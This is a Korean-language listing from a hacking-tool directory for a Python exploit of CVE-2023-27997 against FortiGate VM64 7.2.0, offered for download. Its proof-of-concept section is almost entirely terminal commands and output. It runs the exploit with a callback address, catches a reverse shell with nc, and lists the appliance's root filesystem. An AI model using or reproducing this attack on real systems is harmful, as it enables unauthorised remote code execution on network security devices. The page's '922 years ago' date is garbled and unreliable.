Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-27997 — CVE-2023-27997을 대상으로 하는 파이썬 익스플로잇으로, FortiGate VM64 7.2.0에서 힙 스프레이와 셸코드 인젝션을 사용하여 원격 코드 실행을 달성합니다. | Kitploit
도구/GitHubGitHub/delsploit/cve-2023-27997
Payload GenerationVulnerability AnalysisExploitationShellcodePenetration TestingBinary Exploitation
GitHubdelsploit/cve-2023-27997

CVE-2023-27997

CVE-2023-27997을 대상으로 하는 파이썬 익스플로잇으로, FortiGate VM64 7.2.0에서 힙 스프레이와 셸코드 인젝션을 사용하여 원격 코드 실행을 달성합니다.

저장소 보기
922년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-27997

이 코드로 FortiGate VM64 7.2.0을 익스플로잇할 수 있습니다. (참고: 코드가 매우 어리석은 방식으로 작성되었습니다.)

개념 증명

root@kitploit:~
$ python3 exploit.py 192.168.106.142 10443 192.168.106.143 9999
[+] generating shellcode
[+] salt=b'25c2dcf2'
[+] processing hash
    [+] finding hash in cache
    [-] not in cache
    [+] computing
    [+] loading
[+] heap spray
[+] execute
root@kitploit:~
$ nc -lvp 9999
Listening on [0.0.0.0] (family 0, port 9999)
Connection from [192.168.106.142] port 9999 [tcp/*] accepted (family 2, sport 2165)
Welcome to Node.js v12.20.1.
Type ".help" for more information.
> .help
.break   Sometimes you get stuck, this gets you out
.clear   Alias for .break
.exit    Exit the repl
.help    Print this help message
.load    Load JS from a file into the REPL session
.save    Save all evaluated commands in this REPL session to a file

Press ^C to abort current expression, ^D to exit the repl
> fs.readdir("/", (err, files) => {
  files.forEach(file => {
    console.log(file);
  });
});
... ..... ..... ... undefined
> .fgtsum
.fgtsum2
bin
boot
data
data2
dev
etc
fortidev
init
lib
lib64
local
migadmin
node-scripts
proc
root
sbin
sys
tmp
usr
var

> 
도구 다운로드